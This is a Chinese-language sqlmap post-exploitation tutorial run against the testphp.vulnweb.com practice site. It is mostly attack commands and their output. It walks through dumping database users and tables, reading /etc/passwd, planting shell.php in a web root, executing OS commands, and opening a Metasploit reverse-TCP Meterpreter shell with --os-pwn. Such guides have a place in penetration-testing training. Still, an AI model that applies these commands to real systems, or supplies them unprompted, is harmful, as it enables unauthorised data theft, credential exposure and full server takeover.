SQLMap後滲透

使用sqlmap檢測完後發現類似以下訊息,表示有漏洞

[INFO] Parameter: "id" of type "integer" is vulnerable to boolean-based blind injection.

接著只要查看target.txt確認注入點,就可進行後滲透的工作,如下

/.local/share/sqlmap/output# cat testphp.vulnweb.com/target.txt 
http://testphp.vulnweb.com/artists.php?artist=1 (GET)  
/.local/share/sqlmap/output# sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --privileg 

取得基本信息

–current-db 查詢web目前使用的資料庫

–current-user 查詢web資料庫目前使用的帳號

–users 列出資料庫所有用戶

–privileg 檢視db權限

–passwords 列出資料庫用戶的hash密碼,並順便嘗試爆破取得明文

–schema 列出schema

–exclude-sysdbs 搭配schema一起用,列出所有非系統資料庫的schema


檢視db權限

#sqlmap  -u http://testphp.vulnweb.com/artists.php?artist=1  --privileg
...omit...
database management system users privileges:
[*] 'acuart'@'localhost' [1]:
privilege: USAGE

查詢資料庫所在位置

#sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --sql-shell  
sql-shell> select @@datadir
...omit...
select @@datadir: '/var/lib/mysql/'
...omit...

查看非系統資料庫的schema

#sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --schema --exclude-sysdbs
...omit...
Database: acuart
Table: categ
[3 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| cat_id | int         |
| cdesc  | tinytext    |
| cname  | varchar(50) |
+--------+-------------+

Database: acuart
Table: pictures
[8 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| a_id   | int          |
| cat_id | int          |
| img    | varchar(50)  |
| pic_id | int          |
| plong  | text         |
| price  | int          |
| pshort | mediumtext   |
| title  | varchar(100) |
+--------+--------------+
...omit...


查看資料庫內容


–dbs 列出所有db名稱
–tables 列出所有table名稱
–columns 列出所有欄位資料
-D 指定db, 若要指定多個, 則將db名稱以逗號分隔
-T 指定tables,若要指定多個, 則將table名稱以逗號分隔
-C 指定column,若要指定多個, 則將columns名稱以逗號分隔
–count 指定列出多少行資料
–dump 將所有資料輸出
–where 增加過濾條件


列出所有db名稱

#sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs
...omit...
available databases [2]:                                                                                                                 
[*] acuart
[*] information_schema

列出資料庫acuart的所有table名稱

#sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart --tables
...omit…
Database: acuart                                                                                                                         
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

列出資料庫acuart中資料表users的筆數

#sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users --count
...omit…
Database: acuart
+--------+---------+
| Table  | Entries |
+--------+---------+
| `user` | 10       |
+--------+---------+
...omit...

列出資料庫acuart中資料表users的所有columns名稱

#sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users --columns
...omit...
Database: acuart                                                                                                                         
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+

列出資料庫acuart中資料表users的email欄位資料,並輸出成csv

#sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C email --dump
...
Database: acuart
Table: users
[1 entry]
+-------------------------+
| email                   |
+-------------------------+
| polola@dino.querumaself |
+-------------------------+
[22:35:53] [INFO] table 'acuart.users' dumped to CSV file '/root/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'

列出products資料表中,符合rewritename like ‘%camera%’的資料

# sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --batch -D acuart -T products  --where="rewritename like '%camera%'"  --dump
...omit...
[11:14:17] [INFO] fetching entries for table 'products' in database 'acuart'
Database: acuart
Table: products
[1 entry]
+----+-------+---------------------------+-------------------+---------------------------+
| id | price | name                      | rewritename       | description               |
+----+-------+---------------------------+-------------------+---------------------------+
| 2  | 10    | Web Camera A4Tech PK-335E | web-camera-a4tech | Web Camera A4Tech PK-335E |
+----+-------+---------------------------+-------------------+---------------------------+
...omit...


檔案系統控制

讀取文件

參數 –file-read

sqlmap -r sql.txt --file-read=/etc/passwd

sqlmap -r sql.txt --file-read="C:\boot.ini"


上傳文件

參數 –file-write 和–file-dest

sqlmap.py -r sql.txt --file-write=shell.php --file-dest=/var/www/html/shell.php


執行sql語法

一次一行: –sql-query

$ sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart --sql-query="select * from users"

進入sql shell: –sql-shell

$ sqlmap -r Downloads/ptsmsqli.request -sql-shell   
...omit...
[07:39:14] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell>  

ps:
–os-shell 功能在執行非查詢類型的 SQL 語句(如 UPDATE、INSERT、DELETE、DROP 等)需要資料庫支援stacked queries。如果資料庫不支援就無法執行這些非查詢語句

常見sql語法

  • select @@datadir 查詢DB所在位置
  • select @@servername 查詢servername
  • select @@hostname 查詢hostname
  • SELECT LOAD_FILE('/etc/passwd')

refer
https://websec.ca/kb/sql_injection


執行系統命令

執行指定命令

參數: –os-cmd ,一次只能執行一個命令

執行ls命令 sqlmap -r sql.txt --os-cmd ls

執行id命令

# sqlmap -r sql.txt -p item --os-cmd id
...omit...
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
'uid=104(postgres) gid=106(postgres) groups=106(postgres)'
[hh:mm:19] [INFO] cleaning up the database management system
do you want to remove UDF 'sys_eval'? [Y/n] y
do you want to remove UDF 'sys_exec'? [Y/n] y
[hh:mm:23] [INFO] database management system cleanup finished
[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can only be deleted manually

使用shell

模擬一個可以執行任意指令的 shell,就可以執行多個命令

參數: –os-shell

執行後會選擇程式語言與可寫入的位置

# sqlmap -r sql.txt --os-shell
...omit...
which web application language does the web server support?
[1] ASP 
[2] ASPX
[3] JSP
[4] PHP (default)
> 4              # As my Target system web server supports PHP 
...omit...
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
...omit...
[12:39:08] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> 

確認有可寫入的位置後就會上傳shell,並提供shell互動介面

使用第三方工具連線

參數: –os-pwn

# sqlmap -r sql.txt --os-pwn
...omit...
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
...omit...
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
...omit...
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search

如果剛剛選 Metasploit就會出現以下選擇

which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
> 1         # Reverse TCP is a good choice for establishing a connection
what is the local address? [Enter for '192.168.1.101' (detected)] # No need to change LHost, LPort
which local port number do you want to use? [47984] 
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
...omit...
meterpreter >

refer
http://iosec.in/sqlmap-4/
https://www.cybersecmastery.in/2022/12/operating-system-takeover-with-sqlmap.html


清除上次SQLmap的快取

方法1

刷新session文件

參數:–flush-session

如果不想用之前快取這個目標的session文件,可以使用這個參數。會清空之前的session,重新測試該目標。

方法2

忽略在會話文件中儲存的查詢結果

參數:–fresh-queries

方法3

直接刪除sqlmap output資料夾下的對應的目標目錄

位置通常在/home/kali/.local/share/sqlmap/output/<target>

該目錄下通常會有以下檔案:

  • session.sqlite:sqlmap測試的結果都會保存在這個檔案裡
  • log:sqlmap發現漏洞後下指令會做記錄
  • target.txt:記錄原本sqlmap的檢測指令